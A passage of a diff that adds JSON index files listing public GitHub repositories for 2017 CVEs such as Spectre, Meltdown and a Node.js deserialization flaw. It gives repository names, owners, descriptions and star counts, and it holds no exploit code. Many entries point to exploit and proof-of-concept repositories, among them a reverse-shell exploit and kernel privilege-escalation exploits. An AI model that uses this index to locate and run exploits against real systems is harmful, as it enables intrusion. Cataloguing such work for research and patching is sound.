"Eugnis", + "id": 2463830, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2463830?v=4", + "html_url": "https:\/\/github.com\/Eugnis", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Eugnis\/spectre-attack", + "description": "Example of using revealed \"Spectre\" exploit (CVE-2017-5753 and CVE-2017-5715)", + "fork": false, + "created_at": "2018-01-04T00:28:50Z", + "updated_at": "2024-11-22T21:44:15Z", + "pushed_at": "2018-01-10T01:14:44Z", + "stargazers_count": 757, + "watchers_count": 757, + "has_discussions": false, + "forks_count": 169, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "c", + "example", + "exploit", + "security-vulnerability", + "spectre" + ], + "visibility": "public", + "forks": 169, + "watchers": 757, + "score": 0, + "subscribers_count": 41 + }, + { + "id": 116268310, + "name": "Spectre-PoC", + "full_name": "EdwardOwusuAdjei\/Spectre-PoC", + "owner": { + "login": "EdwardOwusuAdjei", + "id": 16462560, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16462560?v=4", + "html_url": "https:\/\/github.com\/EdwardOwusuAdjei", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EdwardOwusuAdjei\/Spectre-PoC", + "description": "Spectre (CVE-2017-5753) (CVE-2017-5715). Not By Me. Collected from Book.", + "fork": false, + "created_at": "2018-01-04T14:20:13Z", + "updated_at": "2024-08-12T19:35:15Z", + "pushed_at": "2018-01-04T14:27:29Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 4, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 116347505, + "name": "spectre-attack-example", + "full_name": "00052\/spectre-attack-example", + "owner": { + "login": "00052", + "id": 8926090, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8926090?v=4", + "html_url": "https:\/\/github.com\/00052", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/00052\/spectre-attack-example", + "description": "2018年1月2日 (CVE-2017-5753 和 CVE-2017-5715) \"幽灵\" Spectre 漏洞利用", + "fork": false, + "created_at": "2018-01-05T05:51:34Z", + "updated_at": "2021-02-24T01:25:15Z", + "pushed_at": "2018-01-05T05:56:02Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 11, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 116442461, + "name": "spectre-attack-demo", + "full_name": "pedrolucasoliva\/spectre-attack-demo", + "owner": { + "login": "pedrolucasoliva", + "id": 10757421, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10757421?v=4", + "html_url": "https:\/\/github.com\/pedrolucasoliva", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pedrolucasoliva\/spectre-attack-demo", + "description": "Example of using revealed \"Spectre\" exploit (CVE-2017-5753 and CVE-2017-5715)", + "fork": false, + "created_at": "2018-01-06T01:08:15Z", + "updated_at": "2018-01-15T06:12:51Z", + "pushed_at": "2018-01-06T01:09:56Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 116505944, + "name": "spectreScope", + "full_name": "ixtal23\/spectreScope", + "owner": { + "login": "ixtal23", + "id": 11915559, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11915559?v=4", + "html_url": "https:\/\/github.com\/ixtal23", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ixtal23\/spectreScope", + "description": "The demo of the speculative execution attack Spectre (CVE-2017-5753, CVE-2017-5715).", + "fork": false, + "created_at": "2018-01-06T18:27:03Z", + "updated_at": "2024-01-12T13:08:58Z", + "pushed_at": "2018-01-21T22:48:08Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apple", + "centos", + "cmake", + "cpp", + "demo", + "digitalocean", + "exploit", + "intelbug", + "linux", + "macos", + "oracle", + "proofofconcept", + "redhat", + "solaris", + "sparc", + "spectre", + "spectrescope", + "sunos", + "vulnerability", + "windows" + ], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 116532057, + "name": "cve-2017-5753", + "full_name": "albertleecn\/cve-2017-5753", + "owner": { + "login": "albertleecn", + "id": 4608961, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4608961?v=4", + "html_url": "https:\/\/github.com\/albertleecn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/albertleecn\/cve-2017-5753", + "description": "OSX 10.13.2, CVE-2017-5753, Spectre, PoC, C, ASM for OSX, MAC, Intel Arch, Proof of Concept, Hopper.App Output", + "fork": false, + "created_at": "2018-01-07T02:46:38Z", + "updated_at": "2021-03-31T12:50:11Z", + "pushed_at": "2018-01-06T13:06:25Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 263311084, + "name": "Spectre-Vulnerability-CVE-2017-5753-", + "full_name": "sachinthaBS\/Spectre-Vulnerability-CVE-2017-5753-", + "owner": { + "login": "sachinthaBS", + "id": 61072369, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61072369?v=4", + "html_url": "https:\/\/github.com\/sachinthaBS", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sachinthaBS\/Spectre-Vulnerability-CVE-2017-5753-", + "description": null, + "fork": false, + "created_at": "2020-05-12T10:57:11Z", + "updated_at": "2020-05-12T11:24:08Z", + "pushed_at": "2020-05-12T11:24:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-5754.json b/2017/CVE-2017-5754.json new file mode 100644 index 0000000000..a7e68caeec --- /dev/null +++ b/2017/CVE-2017-5754.json @@ -0,0 +1,218 @@ +[ + { + "id": 116214746, + "name": "SpecuCheck", + "full_name": "ionescu007\/SpecuCheck", + "owner": { + "login": "ionescu007", + "id": 6047864, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6047864?v=4", + "html_url": "https:\/\/github.com\/ionescu007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ionescu007\/SpecuCheck", + "description": "SpecuCheck is a Windows utility for checking the state of the software mitigations and hardware against CVE-2017-5754 (Meltdown), CVE-2017-5715 (Spectre v2), CVE-2018-3260 (Foreshadow), and CVE-2018-3639 (Spectre v4)", + "fork": false, + "created_at": "2018-01-04T04:32:26Z", + "updated_at": "2024-11-27T17:09:10Z", + "pushed_at": "2019-11-19T03:36:46Z", + "stargazers_count": 568, + "watchers_count": 568, + "has_discussions": false, + "forks_count": 82, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cpu", + "intelbug", + "internals", + "kaiser", + "kernel", + "kpti", + "meltdown", + "spectre", + "windows" + ], + "visibility": "public", + "forks": 82, + "watchers": 568, + "score": 0, + "subscribers_count": 52 + }, + { + "id": 116319052, + "name": "Am-I-affected-by-Meltdown", + "full_name": "raphaelsc\/Am-I-affected-by-Meltdown", + "owner": { + "login": "raphaelsc", + "id": 1409139, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1409139?v=4", + "html_url": "https:\/\/github.com\/raphaelsc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/raphaelsc\/Am-I-affected-by-Meltdown", + "description": "Meltdown Exploit \/ Proof-of-concept \/ checks whether system is affected by Variant 3: rogue data cache load (CVE-2017-5754), a.k.a MELTDOWN.", + "fork": false, + "created_at": "2018-01-04T23:51:12Z", + "updated_at": "2024-08-31T20:57:41Z", + "pushed_at": "2018-02-27T05:22:38Z", + "stargazers_count": 542, + "watchers_count": 542, + "has_discussions": false, + "forks_count": 71, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit", + "intelbug", + "kaiser", + "kpti", + "meltdown", + "poc", + "pti", + "security" + ], + "visibility": "public", + "forks": 71, + "watchers": 542, + "score": 0, + "subscribers_count": 45 + }, + { + "id": 116368807, + "name": "In-Spectre-Meltdown", + "full_name": "Viralmaniar\/In-Spectre-Meltdown", + "owner": { + "login": "Viralmaniar", + "id": 3501170, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3501170?v=4", + "html_url": "https:\/\/github.com\/Viralmaniar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Viralmaniar\/In-Spectre-Meltdown", + "description": "This tool allows to check speculative execution side-channel attacks that affect many modern processors and operating systems designs. CVE-2017-5754 (Meltdown) and CVE-2017-5715 (Spectre) allows unprivileged processes to steal secrets from privileged processes. These attacks present 3 different ways of attacking data protection measures on CPUs enabling attackers to read data they shouldn't be able to. This tool is originally based on Microsoft: https:\/\/support.microsoft.com\/en-us\/help\/4073119\/protect-against-speculative-execution-side-channel-vulnerabilities-in ", + "fork": false, + "created_at": "2018-01-05T09:43:04Z", + "updated_at": "2024-08-12T19:35:17Z", + "pushed_at": "2018-02-19T03:04:07Z", + "stargazers_count": 93, + "watchers_count": 93, + "has_discussions": false, + "forks_count": 40, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cpu", + "cve-2017-5715", + "cve-2017-5754", + "hacking", + "meltdown", + "penetration-testing", + "pentest-tool", + "spectre", + "tool", + "vulnerability" + ], + "visibility": "public", + "forks": 40, + "watchers": 93, + "score": 0, + "subscribers_count": 17 + }, + { + "id": 116449314, + "name": "Am-I-affected-by-Meltdown", + "full_name": "speecyy\/Am-I-affected-by-Meltdown", + "owner": { + "login": "speecyy", + "id": 35145287, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35145287?v=4", + "html_url": "https:\/\/github.com\/speecyy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/speecyy\/Am-I-affected-by-Meltdown", + "description": "Proof-of-concept \/ Exploit \/ checks whether system is affected by Variant 3: rogue data cache load (CVE-2017-5754), a.k.a ", + "fork": false, + "created_at": "2018-01-06T03:16:33Z", + "updated_at": "2020-02-27T19:31:43Z", + "pushed_at": "2018-01-06T03:17:22Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 118008705, + "name": "Meltdown", + "full_name": "zzado\/Meltdown", + "owner": { + "login": "zzado", + "id": 17024462, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17024462?v=4", + "html_url": "https:\/\/github.com\/zzado", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zzado\/Meltdown", + "description": "PoC for Meltdown in linux (CVE-2017-5754)", + "fork": false, + "created_at": "2018-01-18T16:32:50Z", + "updated_at": "2023-11-29T09:04:53Z", + "pushed_at": "2018-02-07T07:33:50Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 119104266, + "name": "meltdown-aws-scanner", + "full_name": "jdmulloy\/meltdown-aws-scanner", + "owner": { + "login": "jdmulloy", + "id": 3395292, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3395292?v=4", + "html_url": "https:\/\/github.com\/jdmulloy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jdmulloy\/meltdown-aws-scanner", + "description": "Naive shell script to verify Meltdown (CVE-2017-5754) patch status of EC2 instances", + "fork": false, + "created_at": "2018-01-26T21:18:13Z", + "updated_at": "2019-02-27T18:46:20Z", + "pushed_at": "2018-01-26T21:25:09Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-5792.json b/2017/CVE-2017-5792.json new file mode 100644 index 0000000000..0eec547d54 --- /dev/null +++ b/2017/CVE-2017-5792.json @@ -0,0 +1,33 @@ +[ + { + "id": 137987555, + "name": "HPE-iMC-7.3-RMI-Java-Deserialization", + "full_name": "scanfsec\/HPE-iMC-7.3-RMI-Java-Deserialization", + "owner": { + "login": "scanfsec", + "id": 8190138, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8190138?v=4", + "html_url": "https:\/\/github.com\/scanfsec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/scanfsec\/HPE-iMC-7.3-RMI-Java-Deserialization", + "description": "CVE-2017-5792", + "fork": false, + "created_at": "2018-06-20T06:08:47Z", + "updated_at": "2022-11-17T09:09:59Z", + "pushed_at": "2018-06-20T02:31:20Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-5941.json b/2017/CVE-2017-5941.json new file mode 100644 index 0000000000..48529d0d74 --- /dev/null +++ b/2017/CVE-2017-5941.json @@ -0,0 +1,126 @@ +[ + { + "id": 311598667, + "name": "CVE-2017-5941-NodeJS-RCE", + "full_name": "Frivolous-scholar\/CVE-2017-5941-NodeJS-RCE", + "owner": { + "login": "Frivolous-scholar", + "id": 48624840, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48624840?v=4", + "html_url": "https:\/\/github.com\/Frivolous-scholar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Frivolous-scholar\/CVE-2017-5941-NodeJS-RCE", + "description": null, + "fork": false, + "created_at": "2020-11-10T08:50:03Z", + "updated_at": "2022-09-30T06:08:48Z", + "pushed_at": "2020-05-12T07:38:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 621182112, + "name": "Node.js-CVE-2017-5941", + "full_name": "turnernator1\/Node.js-CVE-2017-5941", + "owner": { + "login": "turnernator1", + "id": 95172913, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95172913?v=4", + "html_url": "https:\/\/github.com\/turnernator1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/turnernator1\/Node.js-CVE-2017-5941", + "description": null, + "fork": false, + "created_at": "2023-03-30T06:39:25Z", + "updated_at": "2023-11-15T05:13:25Z", + "pushed_at": "2024-11-21T18:34:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 638795705, + "name": "Lab-for-cve-2018-15133", + "full_name": "Cr4zyD14m0nd137\/Lab-for-cve-2018-15133", + "owner": { + "login": "Cr4zyD14m0nd137", + "id": 77192890, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77192890?v=4", + "html_url": "https:\/\/github.com\/Cr4zyD14m0nd137", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cr4zyD14m0nd137\/Lab-for-cve-2018-15133", + "description": "Ejecución de exploit de deserialización con CVE-2017-5941", + "fork": false, + "created_at": "2023-05-10T06:01:10Z", + "updated_at": "2023-05-13T04:51:35Z", + "pushed_at": "2023-05-13T05:22:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 679935293, + "name": "nodejshell", + "full_name": "uartu0\/nodejshell", + "owner": { + "login": "uartu0", + "id": 102340458, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102340458?v=4", + "html_url": "https:\/\/github.com\/uartu0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/uartu0\/nodejshell", + "description": "Exploit de reverseshell para desserialização em NodeJs (CVE-2017-5941)", + "fork": false, + "created_at": "2023-08-18T00:54:43Z", + "updated_at": "2023-10-09T19:21:49Z", + "pushed_at": "2023-08-27T23:32:41Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-6008.json b/2017/CVE-2017-6008.json new file mode 100644 index 0000000000..ee0a1a8008 --- /dev/null +++ b/2017/CVE-2017-6008.json @@ -0,0 +1,33 @@ +[ + { + "id": 92819342, + "name": "Exploit-CVE-2017-6008", + "full_name": "cbayet\/Exploit-CVE-2017-6008", + "owner": { + "login": "cbayet", + "id": 8035388, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8035388?v=4", + "html_url": "https:\/\/github.com\/cbayet", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cbayet\/Exploit-CVE-2017-6008", + "description": "Exploits for CVE-2017-6008, a kernel pool buffer overflow leading to privilege escalation.", + "fork": false, + "created_at": "2017-05-30T09:55:55Z", + "updated_at": "2024-11-06T16:21:19Z", + "pushed_at": "2024-11-06T16:21:16Z", + "stargazers_count": 116, + "watchers_count": 116, + "has_discussions": false, + "forks_count": 25, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 25, + "watchers": 116, + "score": 0, + "subscribers_count": 10 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-6074.json b/2017/CVE-2017-6074.json new file mode 100644 index 0000000000..10c24cb17f --- /dev/null +++ b/2017/CVE-2017-6074.json @@ -0,0 +1,64 @@ +[ + { + "id": 263401795, + "name": "Linux-Kernel-4.4.0-Ubuntu---DCCP-Double-Free-Privilege-Escalation-CVE-2017-6074", + "full_name": "BimsaraMalinda\/Linux-Kernel-4.4.0-Ubuntu---DCCP-Double-Free-Privilege-Escalation-CVE-2017-6074", + "owner": { + "login": "BimsaraMalinda", + "id": 65068545, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65068545?v=4", + "html_url": "https:\/\/github.com\/BimsaraMalinda", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BimsaraMalinda\/Linux-Kernel-4.4.0-Ubuntu---DCCP-Double-Free-Privilege-Escalation-CVE-2017-6074", + "description": null, + "fork": false, + "created_at": "2020-05-12T17:13:43Z", + "updated_at": "2022-01-21T07:01:31Z", + "pushed_at": "2020-05-12T17:14:22Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 666740330, + "name": "CVE-2017-6074", + "full_name": "toanthang1842002\/CVE-2017-6074", + "owner": { + "login": "toanthang1842002", + "id": 75765145, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75765145?v=4", + "html_url": "https:\/\/github.com\/toanthang1842002", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/toanthang1842002\/CVE-2017-6074", + "description": null, + "fork": false, + "created_at": "2023-07-15T12:20:51Z", + "updated_at": "2023-07-15T12:22:14Z", + "pushed_at": "2023-07-15T12:22:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-6079.json b/2017/CVE-2017-6079.json new file mode 100644 index 0000000000..0e8602d44c --- /dev/null +++ b/2017/CVE-2017-6079.json @@ -0,0 +1,33 @@ +[ + { + "id": 149909331, + "name": "CVE-2017-6079-Blind-Command-Injection-In-Edgewater-Edgemarc-Devices-Exploit", + "full_name": "MostafaSoliman\/CVE-2017-6079-Blind-Command-Injection-In-Edgewater-Edgemarc-Devices-Exploit", + "owner": { + "login": "MostafaSoliman", + "id": 13528184, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13528184?v=4", + "html_url": "https:\/\/github.com\/MostafaSoliman", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MostafaSoliman\/CVE-2017-6079-Blind-Command-Injection-In-Edgewater-Edgemarc-Devices-Exploit", + "description": null, + "fork": false, + "created_at": "2018-09-22T19:18:47Z", + "updated_at": "2024-08-12T19:41:52Z", + "pushed_at": "2018-09-22T21:17:51Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 18, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-6090.json b/2017/CVE-2017-6090.json new file mode 100644 index 0000000000..c07b59b6b1 --- /dev/null +++ b/2017/CVE-2017-6090.json @@ -0,0 +1,38 @@ +[ + { + "id": 121817216, + "name": "exploit-CVE-2017-6090", + "full_name": "jlk\/exploit-CVE-2017-6090", + "owner": { + "login": "jlk", + "id": 146853, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/146853?v=4", + "html_url": "https:\/\/github.com\/jlk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jlk\/exploit-CVE-2017-6090", + "description": "Containerized exploitable PhpCollab", + "fork": false, + "created_at": "2018-02-17T01:07:58Z", + "updated_at": "2018-02-20T19:03:45Z", + "pushed_at": "2018-02-17T01:38:50Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "containers", + "php", + "security", + "whoot" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-6206.json b/2017/CVE-2017-6206.json new file mode 100644 index 0000000000..4679ad04d2 --- /dev/null +++ b/2017/CVE-2017-6206.json @@ -0,0 +1,33 @@ +[ + { + "id": 85605788, + "name": "CVE-2017-6206", + "full_name": "varangamin\/CVE-2017-6206", + "owner": { + "login": "varangamin", + "id": 3868301, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3868301?v=4", + "html_url": "https:\/\/github.com\/varangamin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/varangamin\/CVE-2017-6206", + "description": "The DGS-1510 Websmart switch series firmware has been found to have security vulneratiblies. The vulnerabilities include unauthenticated command bypass and unauthenticated information disclosure.", + "fork": false, + "created_at": "2017-03-20T17:24:22Z", + "updated_at": "2022-06-09T13:49:07Z", + "pushed_at": "2020-07-07T00:01:32Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-6370.json b/2017/CVE-2017-6370.json new file mode 100644 index 0000000000..8a755cc1cb --- /dev/null +++ b/2017/CVE-2017-6370.json @@ -0,0 +1,33 @@ +[ + { + "id": 85539985, + "name": "TYPO3-v7.6.15-Unencrypted-Login-Request", + "full_name": "faizzaidi\/TYPO3-v7.6.15-Unencrypted-Login-Request", + "owner": { + "login": "faizzaidi", + "id": 12153050, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12153050?v=4", + "html_url": "https:\/\/github.com\/faizzaidi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/faizzaidi\/TYPO3-v7.6.15-Unencrypted-Login-Request", + "description": "TYPO3 v7.6.15 Unencrypted Login Request Assigned CVE Number: CVE-2017-6370", + "fork": false, + "created_at": "2017-03-20T05:51:07Z", + "updated_at": "2020-07-17T05:22:53Z", + "pushed_at": "2017-03-20T05:51:43Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-6516.json b/2017/CVE-2017-6516.json new file mode 100644 index 0000000000..2eb675d141 --- /dev/null +++ b/2017/CVE-2017-6516.json @@ -0,0 +1,33 @@ +[ + { + "id": 496953412, + "name": "CVE-2017-6516-mcsiwrapper-", + "full_name": "Rubytox\/CVE-2017-6516-mcsiwrapper-", + "owner": { + "login": "Rubytox", + "id": 9460891, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9460891?v=4", + "html_url": "https:\/\/github.com\/Rubytox", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Rubytox\/CVE-2017-6516-mcsiwrapper-", + "description": "A PoC \/ methodology to exploit CVE-2017-6516", + "fork": false, + "created_at": "2022-05-27T10:24:41Z", + "updated_at": "2022-05-27T10:24:41Z", + "pushed_at": "2022-05-27T10:35:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-6558.json b/2017/CVE-2017-6558.json new file mode 100644 index 0000000000..7e0e38fc8e --- /dev/null +++ b/2017/CVE-2017-6558.json @@ -0,0 +1,33 @@ +[ + { + "id": 105633536, + "name": "iBall-UTStar-CVEChecker", + "full_name": "GemGeorge\/iBall-UTStar-CVEChecker", + "owner": { + "login": "GemGeorge", + "id": 15928266, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15928266?v=4", + "html_url": "https:\/\/github.com\/GemGeorge", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GemGeorge\/iBall-UTStar-CVEChecker", + "description": "POC checks for CVE-2017-6558, CVE-2017-14243 & CVE-2017-14244", + "fork": false, + "created_at": "2017-10-03T09:16:57Z", + "updated_at": "2024-08-12T19:33:01Z", + "pushed_at": "2021-05-21T12:28:12Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-6640.json b/2017/CVE-2017-6640.json new file mode 100644 index 0000000000..ec49274048 --- /dev/null +++ b/2017/CVE-2017-6640.json @@ -0,0 +1,33 @@ +[ + { + "id": 246609535, + "name": "CVE-2017-6640-POC", + "full_name": "hemp3l\/CVE-2017-6640-POC", + "owner": { + "login": "hemp3l", + "id": 48886170, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48886170?v=4", + "html_url": "https:\/\/github.com\/hemp3l", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hemp3l\/CVE-2017-6640-POC", + "description": "Proof of concept for CVE-2017-6640 as burp extension", + "fork": false, + "created_at": "2020-03-11T15:32:44Z", + "updated_at": "2022-07-02T08:48:50Z", + "pushed_at": "2020-03-20T14:06:12Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-6736.json b/2017/CVE-2017-6736.json new file mode 100644 index 0000000000..14763b2a7a --- /dev/null +++ b/2017/CVE-2017-6736.json @@ -0,0 +1,64 @@ +[ + { + "id": 117869057, + "name": "CiscoSpectreTakeover", + "full_name": "GarnetSunset\/CiscoSpectreTakeover", + "owner": { + "login": "GarnetSunset", + "id": 13430434, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13430434?v=4", + "html_url": "https:\/\/github.com\/GarnetSunset", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GarnetSunset\/CiscoSpectreTakeover", + "description": "A POC chain exploit using the recent Cisco SMP exploit (CVE-2017-6736) to chain into Spectre (CVE-2017-5753 and 